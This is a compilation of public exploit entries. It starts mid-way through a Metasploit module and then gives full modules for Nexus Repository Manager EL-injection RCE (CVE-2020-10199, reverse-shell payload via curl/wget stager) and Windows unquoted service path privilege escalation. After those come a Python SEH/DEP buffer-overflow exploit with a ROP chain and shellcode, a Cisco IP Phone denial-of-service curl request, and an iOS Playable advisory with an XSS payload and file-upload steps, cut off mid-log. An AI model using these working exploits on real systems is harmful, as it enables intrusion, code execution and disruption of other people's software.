      tpdp_packet = update_len_field(tpdp_packet, ciphertext.length)
      tpdp_packet = calc_checksum(tpdp_packet.bytes)

      udp_sock.put(tpdp_packet)

      # Sleep to make sure the payload is processed by a target
      Rex.sleep(1)

      # Print progress
      if ((index+1) % mod == 0)
        percentage = 20 * ((index+1) / mod)
        # very advanced mathemathics in use here to show the progress bar
        print_status("#{peer} - [0%]=#{' =' * ((percentage*2/10-1)-1)}>#{' -'*(20-(percentage*2/10))}[100%]")
        if percentage == 100
          # a bit of cheating to get the last char done right
          index = -2
        end
        #print_status("#{peer} - #{download_cmd[0..index+1]}#{'-' * (download_cmd[index+1..-1].length-1)}")
      end
    }

    # Send the exec command. From here we should receive the connection
    print_status("#{peer} - Command file sent, attempting to execute...")
    tpdp_packet = exec_cmd_file(tpdp_packet_template.dup)
    udp_sock.put(tpdp_packet)

    timeout = 0
    while not @payload_sent
      Rex.sleep(1)
      timeout += 1
      if timeout == datastore['MAX_WAIT'].to_i
        fail_with(Failure::Unknown, "#{peer} - Timeout reached! Payload was not downloaded :(")
      end
    end

    disconnect_udp
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
'Name'            => 'Nexus Repository Manager Java EL Injection RCE',
'Description'     => %q{
        This module exploits a Java Expression Language (EL) injection in Nexus
        Repository Manager versions up to and including 3.21.1 to execute code
        as the Nexus user. Tested against 3.21.1-01.
      },
'Author'          => [
'Alvaro Muñoz', # Discovery
'wvu'           # Module
      ],
'References'      => [
        ['CVE', '2020-10199'],
        ['URL', 'https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype'],
        ['URL', 'https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31']
      ],
'DisclosureDate'  => '2020-03-31', # Vendor advisory
'License'         => MSF_LICENSE,
'Platform'        => 'linux',
'Arch'            => [ARCH_X86, ARCH_X64],
'Privileged'      => false,
'Targets'         => [['Nexus Repository Manager <= 3.21.1', {}]],
'DefaultTarget'   => 0,
'DefaultOptions'  => {'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'},
'CmdStagerFlavor' => %i[curl wget],
'Notes'           => {
'Stability'     => [CRASH_SAFE],
'Reliability'   => [REPEATABLE_SESSION],
'SideEffects'   => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
      }
    ))

    register_options([
      Opt::RPORT(8081),
      OptString.new('TARGETURI', [true, 'Base path', '/']),
      OptString.new('USERNAME',  [true, 'Nexus username', 'admin']),
      OptString.new('PASSWORD',  [true, 'Nexus password', 'admin'])
    ])
  end

  def post_auth?
    # Pre-auth RCE? https://twitter.com/iamnoooob/status/1246182773427240967
    true
  end

  # Send a GET / request to the server, check the response for a Server header
  # containing the Nexus version, and then check if it's a vulnerable version
  def check
    res = send_request_cgi(
'method' => 'GET',
'uri'    => normalize_uri(target_uri.path)
    )

    unless res
      return CheckCode::Unknown('Target did not respond to check request.')
    end

    unless res.headers['Server']
      return CheckCode::Unknown('Target did not respond with Server header.')
    end

    # Example Server header:
    # Server: Nexus/3.21.1-01 (OSS)
    version = res.headers['Server'].scan(%r{^Nexus/([\d.-]+)}).flatten.first

    unless version
      return CheckCode::Unknown('Target did not respond with Nexus version.')
    end

    if Gem::Version.new(version) <= Gem::Version.new('3.21.1')
      return CheckCode::Appears("Nexus #{version} is a vulnerable version.")
    end

    CheckCode::Safe("Nexus #{version} is NOT a vulnerable version.")
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    print_status("Executing command stager for #{datastore['PAYLOAD']}")

    # This will drop a binary payload to disk and execute it!
    execute_cmdstager(
      noconcat: true,
      cookie:   login(datastore['USERNAME'], datastore['PASSWORD'])
    )
  end

  def login(username, password)
    print_status("Logging in with #{username}:#{password}")

    res = send_request_cgi({
'method'     => 'POST',
'uri'        => normalize_uri(target_uri.path,
'/service/rapture/session'),
'vars_post'  => {
'username' => Rex::Text.encode_base64(username),
'password' => Rex::Text.encode_base64(password)
      },
'partial'    => true # XXX: Return partial response despite timeout
    }, 3.5)

    unless res
      fail_with(Failure::Unknown, 'Target did not respond to login request')
    end

    cookie = res.get_cookies

    unless res.code == 204 && cookie.match(/NXSESSIONID=[\h-]+/)
      fail_with(Failure::NoAccess, 'Could not log in with specified creds')
    end

    print_good("Logged in with #{cookie}")
    cookie
  end

  # This is defined so that CmdStager can use it!
  def execute_command(cmd, opts = {})
    vprint_status("Executing command: #{cmd}")

    res = send_request_cgi(
'method' => 'POST',
'uri'    => normalize_uri(target_uri.path,
'/service/rest/beta/repositories/go/group'),
      # HACK: Bypass CSRF token with random User-Agent header
'agent'  => rand_text_english(8..42),
'cookie' => opts[:cookie],
'ctype'  => 'application/json',
'data'   => json_payload(cmd)
    )

    unless res
      fail_with(Failure::Unknown, 'Target did not respond to payload request')
    end

    unless res.code == 400 && res.body.match(/java\.lang\.UNIXProcess@\h+/)
      fail_with(Failure::PayloadFailed, "Could not execute command: #{cmd}")
    end

    print_good("Successfully executed command: #{cmd}")
  end

  # PoC based off API docs for /service/rest/beta/repositories/go/group:
  # http://localhost:8081/#admin/system/api
  def json_payload(cmd)
    {
'name'                          => 'internal',
'online'                        => true,
'storage'                       => {
'blobStoreName'               => 'default',
'strictContentTypeValidation' => true
      },
'group'                         => {
        # XXX: memberNames has to be an array, but the API example was a string
'memberNames'                 => [el_payload(cmd)]
      }
    }.to_json
  end

  # Helpful resource from which I borrowed the EL payload:
  # https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf
  def el_payload(cmd)
    # HACK: Format our EL expression nicely and then strip introduced whitespace
    el = <<~EOF.gsub(/\s+/, '')
      ${
"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke(
"".getClass().forName("java.lang.Runtime")
        ).exec("PATCH_ME")
      }
    EOF

    # Patch in our command, escaping any double quotes
    el.sub('PATCH_ME', cmd.gsub('"', '\\"'))
  end

end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/exe'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Post::Windows::Services
  include Msf::Exploit::Deprecated
  moved_from 'exploits/windows/local/trusted_service_path'

  def initialize(info={})
    super( update_info( info,
'Name'           => 'Windows Unquoted Service Path Privilege Escalation',
'Description'    => %q{
        This module exploits a logic flaw due to how the lpApplicationName parameter
        is handled.  When the lpApplicationName contains a space, the file name is
        ambiguous.  Take this file path as example: C:\program files\hello.exe;
        The Windows API will try to interpret this as two possible paths:
        C:\program.exe, and C:\program files\hello.exe, and then execute all of them.
        To some software developers, this is an unexpected behavior, which becomes a
        security problem if an attacker is able to place a malicious executable in one
        of these unexpected paths, sometimes escalate privileges if run as SYSTEM.
        Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the
        same problem.

        The offensive technique is also described in Writing Secure Code (2nd Edition),
        Chapter 23, in the section "Calling Processes Security" on page 676.

        This technique was previously called Trusted Service Path, but is more commonly
        known as Unquoted Service Path.

        The service exploited won't start until the payload written to disk is removed.
        Manual cleanup is required.
      },
'References'     =>
        [
          ['URL', 'http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx'],
          ['URL', 'http://www.microsoft.com/learning/en/us/book.aspx?id=5957&locale=en-us'],  #pg 676
          ['URL', 'https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae']
        ],
'DisclosureDate' => "Oct 25 2001",
'License'        => MSF_LICENSE,
'Author'         =>
        [
'sinn3r', #msf module
'h00die'  #improvements
        ],
'Platform'       => [ 'win'],
'Targets'        => [ ['Windows', {}] ],
'SessionTypes'   => [ "meterpreter" ],
'DefaultTarget'  => 0,
'Notes'          =>
        {
'Stability'   => [ CRASH_SERVICE_DOWN ],
'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
'Reliability' => [ REPEATABLE_SESSION, ],
        }
    ))
    register_options([
      OptBool.new('QUICK', [ false, 'Stop at first vulnerable service found', true])
    ])
  end

  def check
    services = enum_vuln_services(datastore['QUICK'])
    if services.empty?
      return CheckCode::Safe
    end
    services.each do |svrs|
      fpath = svrs[1].split('')[0...-1] # cut off the .exe last portion
      unless generate_folders(fpath, datastore['QUICK']).empty?
        # Found service is running system with writable path
        return CheckCode::Vulnerable
      end
    end
    CheckCode::Safe
  end

  ###
  # this function uses a loop to go from the longest potential path (most likely with write access), to shortest.
  # >> fpath = 'C:\\Program Files\\A Subfolder\\B Subfolder\\C Subfolder\\SomeExecutable.exe'
  # >> fpath = fpath.split('')[0...-1]
  # >> fpath.reverse.each { |x| puts fpath[0..fpath.index(x)].join('')}
  # C:\Program Files\A Subfolder\B Subfolder\C
  # C:\Program Files\A Subfolder\B
  # C:\Program Files\A
  # C:\Program
  ###

  def generate_folders(fpath, quick)
    potential_paths = []
    fpath.reverse.each do |x|
      path = fpath[0..fpath.index(x)].join('')
      path_no_file = path.split('\\')[0...-1].join('\\')
      vprint_status("Checking writability to: #{path_no_file}")
      # when we test writability, we drop off last part since thats the file name
      unless writable?(path_no_file)
        vprint_error("Path not writable")
        next
      end
      vprint_good("Path is writable")
      # include file name for the path
      potential_paths << path
      return potential_paths if quick
    end
    potential_paths
  end

  def enum_vuln_services(quick=false)
    vuln_services = []

    each_service do |service|
      info = service_info(service[:name])

      # Sometimes there's a null byte at the end of the string,
      # and that can break the regex -- annoying.
      if info[:path]
        cmd = info[:path].strip

        # Check path:
        # - Filter out paths that begin with a quote
        # - Filter out paths that don't have a space
        next if cmd !~ /^[a-z]\:.+\.exe$/i
        next if not cmd.split("\\").map {|p| true if p =~ / /}.include?(true)

        vprint_good("Found vulnerable service: #{service[:name]} - #{cmd} (#{info[:startname]})")
        vuln_services << [service[:name], cmd]

        # This process can be pretty damn slow.
        # Allow the user to just find one, and get the hell out.
        break if not vuln_services.empty? and quick
      end
    end

    vuln_services
  end

  # overwrite the writable? included in file.rb addon since it can't do windows.
  def writable?(path)
    f="#{path}\\#{Rex::Text.rand_text_alphanumeric(4..8)}.txt"
    words = Rex::Text.rand_text_alphanumeric(9)
    begin
      # path needs to have double, not single quotes
      c= %Q(cmd.exe /C echo '#{words}'>> "#{f}"&& type "#{f}"&& del "#{f}")
      cmd_exec(c).to_s.include? words
    rescue Rex::Post::Meterpreter::RequestError => e
      false
    end
  end

  def exploit
    #
    # Exploit the first service found
    #
    print_status("Finding a vulnerable service...")
    svrs_list = enum_vuln_services(datastore['QUICK'])

    fail_with(Failure::NotVulnerable, "No service found with trusted path issues") if svrs_list.empty?

    svrs_list.each do |svrs|
      print_status("Attempting exploitation of #{svrs[0]}")
      svr_name = svrs[0]
      fpath    = svrs[1]
      fpath = fpath.split('')[0...-1] # cut off the .exe last portion
      vprint_status('Enumerating vulnerable paths')
      potential_paths = generate_folders fpath, datastore['QUICK']

      #
      # Drop the malicious executable into the path
      #
      potential_paths.each do |path|
        exe_path = "#{path}.exe"
        print_status("Placing #{exe_path} for #{svr_name}")
        exe = generate_payload_exe_service({:servicename=>svr_name})
        print_status("Attempting to write #{exe.length.to_s} bytes to #{exe_path}...")
        write_file(exe_path, exe)
        print_good("Manual cleanup of #{exe_path} is required due to a potential reboot for exploitation.")
        print_good "Successfully wrote payload"
        #
        # Run the service, let the Windows API do the rest
        #
        print_status("Launching service #{svr_name}...")
        print_status("Manual cleanup of the payload file is required. #{svr_name} will fail to start as long as the payload remains on disk.")
        unless service_restart(svr_name)
          print_error 'Unable to restart service.  System reboot or an admin restarting the service is required.  Payload left on disk!!!'
        end
        break
      end
    end
  end
end

# Exploit Title: Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)
# Date: 2020-04-15
# Exploit Author: Bailey Belisario
# Tested On: Windows 7 Ultimate x64
# Software Link: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe
# Version: 1.7.11
# Exploit Length: 1015 Bytes
# Steps : Open application > Register > In Username field paste content of pwn.txt file (Note open this in sublime or vscode)

# Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass using VirtualProtect() on Local Buffer Overflow 
# Exploit used with Python2.7
#------------------------------------------------------------------------------------------------------------------------------------#
# Bad Characters: \x00\x0a\x0d                                                                                                        #
# SEH Offset: 1012                                                                                                                   #
# Modules Used: SkinMagic.dll & Easy MPEG to DVD Burner.exe                                                             #
#------------------------------------------------------------------------------------------------------------------------------------#

# Register setup for VirtualProtect() (Bypass DEP) :
#---------------------------------------------------
# EAX = Points to PUSHAD at time VirtualProtect() is called
# ECX = lpflOldProtect (0x10047d30 as writable location)
# EDX = flNewProtect(0x40)
# EBX = dwSize (0x92)
# ESP = lpAddress (automatic)
# EBP = ReturnTo (ptr to jmp esp)
# ESI = ptr to VirtualProtect()
# EDI = ROP NOP (RETN)

import struct

def create_rop_chain():

    rop_gadgets = [

      # Put 1 in EDX and decrement to 0
      0x10031752,  # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN
      0x1003629a,  # ADD EAX,4 # DEC EDX # JNE SKINMAGIC!SETSKINMENU+0X2F505 (10036295) # POP ESI # RETN
      0x11111111,  # Filler

      # Pop the pointer of VirtualProtect into EAX 
      0x10037b12,  # POP EAX # RETN
      0x1003b268,  # ptr to &VirtualProtect() [IAT SkinMagic.dll]

      # Dereference Pointer into EDX then move back to EAX
      0x1001c011,  # ADD EDX,DWORD PTR [EAX] # RETN 0x0C
      0x10031772,  # MOV EAX,EDX # RETN
      0x11111111,  # Filler
      0x11111111,  # Filler
      0x11111111,  # Filler

      # Push VP and pop into EBP
      0x1002e17b,  # PUSH EAX # PUSH ESP # XOR EAX,EAX # POP ESI # POP EBP # RETN 0x0C
      0x10037b12,  # POP EAX # RETN
      0x11111111,  # Filler
      0x11111111,  # Filler
      0x11111111,  # Filler

      # Use this to get to address needed to Pop VP into ESI
      0x1003619e,  # POP EAX # POP ESI # RETN

      # Move VP to +12 on stack then push the POP POP RETN
      0x10032485,  # MOV DWORD PTR [ESP+0CH],EBP # LEA EBP,DWORD PTR DS:[ESP+0CH] # PUSH EAX # RETN
      0x11111111,  # Filler popped
      0x11111111,  # Filler popped

      # Set ESI to VP
      0x1002e1ce,  # POP ESI # RETN [SkinMagic.dll] 
      0x11111111,  # Where VP is MOV into 

      # Set EBP with POP EBP RETN
      0x1002894f,  # POP EBP # RETN [SkinMagic.dll] 
      0x1002894f,  # skip 4 bytes [SkinMagic.dll]

      # Set EDX (# s -d 0x10000000 L?0x10050000 0000003f <- used to find 3F)
      # Clear out EDX, set it to 0x01, find address where DWORD of EAX will be 0x3F, then add to EDX to be 0x40
      0x10031752,  # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN
       0x10037b12,  # POP EAX # RETN
       0x1005a0a0,  # Address of 3F
       0x10026173,  # ADD EDX,DWORD PTR [EAX] # RETN

       # Set EBX to 0x92 assuming EBX is 0, but could work with a decent range of numbers
       # Note: This should be at least length of shellcode
       0x100362c6,  # XOR EAX,EAX # RETN
      0x10033fb2,  # ADD AL,0C9 # RETN
      0x10033fb2,  # ADD AL,0C9 # RETN
      0x10035c12,  # ADC BL,AL # OR CL,CL # JNE SKINMAGIC!SETSKINMENU+0X2EEDB (10035C6B) # RETN

      # Set ECX to writable location
      0x1003603f,  # POP ECX # RETN [SkinMagic.dll] 
      0x10047d30,  # &Writable location [SkinMagic.dll]

      # Set EDI to ROP NOP
      0x100395c2,  # POP EDI # RETN [SkinMagic.dll] 
      0x10032982,  # RETN (ROP NOP) [SkinMagic.dll]

      # Do PUSHAD and be 1337
      0x10037654,  # POP EAX # RETN 
      0xa140acd2,  # CONSTANT
      0x100317c8,  # ADD EAX,5EFFC883 # RETN 
      0x1003248d,  # PUSH EAX # RETN

      # Used to jump to ESP
      0x1001cc57,  # ptr to 'push esp # ret ' [SkinMagic.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

ropChain = create_rop_chain()

# CALC.EXE for POC
shell = ("\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64\x8B\x72"
"\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E\x18\x8B\x5F"
"\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C\x1F\x24"
"\x01\xF9\x0F\xB7\x2C\x51\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45"
"\x75\xF1\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\xAE\xFF\xD7")

# 148 Bytes needed to return to ROP CHAIN
paddingBeginning = "B"*148

# NOP Sled needs to be sufficient length, from some math, I came out with a buffer of 444 - len(ROP CHAIN)  
nopLen = 444 - len(ropChain)
nopSled = '\x90'*nopLen

# Padding to SEH needs to consider the 420 bytes remaining - shellcode
paddingMiddleLen = 420 - len(shell)
paddingMiddle = 'B'*paddingMiddleLen

# 0x004043ee (add esp, 7D4) Stack Pivot 2004 bytes
# This brings total bytes to SEH Offset (1012) + 3 for a total of 1015 bytes
seh = "\xee\x43\x40"

# Exploit Visualization  #
#------------------------#
#  BBBBBBBBBBBBBBBBBBBB  #
#------------------------#
#       ROP CHAIN        #
#------------------------#
#          NOPS          #
#------------------------#
#       SHELL CODE       #
#------------------------#
#  BBBBBBBBBBBBBBBBBBBB  #
#------------------------#
#          SEH           #
#------------------------#

exploit = paddingBeginning + ropChain + nopSled + shell + paddingMiddle + seh

file = open("pwn.txt", 'w')
file.write(exploit)
file.close()

# Exploit Title: Cisco IP Phone 11.7 - Denial of Service (PoC)
# Date: 2020-04-15
# Exploit Author: Jacob Baines
# Vendor Homepage: https://www.cisco.com
# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html
# Version: Before 11.7(1)
# Tested on: Cisco Wireless IP Phone 8821
# CVE: CVE-2020-3161
# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs
# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24

curl -v --path-as-is --insecure
https://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Document Title:
===============
Playable v9.18 iOS - Multiple Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2198


Release Date:
=============
2020-04-16


Vulnerability Laboratory ID (VL-ID):
====================================
2198


Common Vulnerability Scoring System:
====================================
7.3


Vulnerability Class:
====================
Multiple


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Watch your MKV, MP4 and MOV movie files on your iPad, iPhone or iPod
Touch without conversion -
just copy files to your device through iTunes or over Wifi!  To search
for closed captions /
subtitles select a video then press the magnifying glass icon to the top
right of the video.

(Copy of the Homepage:
https://apps.apple.com/de/app/playable-the-full-hd-media-player/id502405034
)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
vulnerabilities in the official Playable v9.18 apple ios mobile application.


Affected Product(s):
====================
Portable Ltd
Product: Playable v9.18 - iOS Mobile Web Application


Vulnerability Disclosure Timeline:
==================================
2020-04-16: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
1.1
A persistent script code injection web vulnerability has been discovered
in the official Playable v9.18 apple ios mobile application.
The vulnerability allows remote attackers to inject own malicious
persistent script codes to the application-side for manipulation.

The vulnerability is located in the filename parameter of the upload
module. Attackers with wifi access are able to perform uploads
with malicious script code to manipulation the mobile application ui.
The request method to inject is POST and the attack vector of
the vulnerability is persistent. Attackers are able to inject html and
javascript codes to comrpomise the mobile wifi web-application.
The injection point is the upload form on localhost:8881 and the
execution occurs on localhost:80 with the visible ui listing.

Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected mobile
application modules.

Request Method(s):
[+] POST

Vulnerable Function(s):
[+] upload

Vulnerable Parameter(s):
[+] filename


1.2
An arbitrary file upload web vulnerability has been discovered in the
official Playable v9.18 apple ios mobile application.
The arbitary file upload vulnerability allows remote attackers to upload
malicious files to compromise the mobile application.

The vulnerability is located in the filename parameter of the upload
module. Attackers with wifi access are able to perform
uploads with malicious file extions to bypass the parse function. In a
second step the attacker requests the local file to
execute the malicious content on the local web-server. The request
method to inject is POST and the attack vector of the
vulnerability is located on the application-side. The injection point is
the upload form on localhost:8881. The execution
point becomes visible by a request the localhost:80/vid/[filename] path
with the uploaded file content. The is present
because of a missing file parse and insecure upload handling on file
extensions. As well the local web-server can be
reconfigured to provide more security on user interactions.

Successful exploitation of the arbitrary file upload vulnerability
results in a compromise of the local ios mobile application.

Request Method(s):
[+] POST

Vulnerable Function(s):
[+] upload

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] /vid/


Proof of Concept (PoC):
=======================
1.1
The persistent script code injection vulnerability can be exploited by
remote attackers with wifi network access without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Install the ios application
(https://apps.apple.com/us/app/playable-the-full-hd-media-player/id502405034)
2. Start the ios application on your local ios device
3. Start the wifi share service in the application ui
4. Open the web-browser
5. Tamper the http requests
6. Prepare to upload any file and press the upload button
7. Inject as filename any html/js script code payload
8. Continue to transmit the POST method request
9. The file executes on the index listing on port 8881
(http://localhost:8881/index.html)
10. Successful reproduce of the persistent script code injection web
vulnerability!


PoC: Exploitation
>"<iframe src=evil.source onload=alert(document.domain)>.jpg


--- PoC Session logs [POST] ---
Status: 200[OK]
POST http://localhost:8881/upload
Mime Type[text/html]
   Request Header:
      Host[localhost:8881]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
      Accept[*/*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:8881/index.html]
      Content-Length[8559]
      Content-Type[multipart/form-data;
boundary=---------------------------3823323145734]
      Connection[keep-alive]
   POST-Daten:
      POST_DATA[-----------------------------3823323145734
Content-Disposition: form-data; name="file"; filename=">"<iframe
src=evil.source onload=alert(document.domain)>.jpg"
-
Status: 200[OK]
GET http://localhost/evil.source
Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost/evil.source]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
      Cache-Control[max-age=0]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[8559]



1.2
the arbitrary file upload vulnerability can be exploited by local
attackers with wifi network access without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Install the ios application
(https://apps.apple.com/us/app/playable-the-full-hd-media-player/id502405034)
2. Start the ios application on your local ios device
3. Start the wifi share service in the application ui
4. Open the web-browser
5. Tamper the http requests
6. Prepare a js file with malicious test content
7. Extend the file name with .jpg
Note: The upload mechanism does not parse or checks for multiple
extensions on file uploads
8. Upload the file by pushing the Upload File button
9. Open the url in the default /vid/ folder and remove the .jpg extension
10. The simple js executes in the scripting engine when opening
11. Successful reproduce of the arbitrary file upload vulnerability!
Note: Using the ftp you can perform to create the file via console
ftp://localhost (read/write permissions)


PoC: Exploitation
http://localhost/vid/clay.js.jpg


--- PoC Session logs [POST] ---
Status: 200[OK]
POST http://localhost:8881/upload
Mime Type[text/html]
   Request Header:
      Host[localhost:8881]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
      Accept[*/*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:8881/index.html]
      Content-Length[86856]
      Content-Type[multipart/form-data;
boundary=---------------------------3823323145733]
      Connection[keep-alive]
   POST-Daten:
      POST_DATA[-----------------------------3823323145733
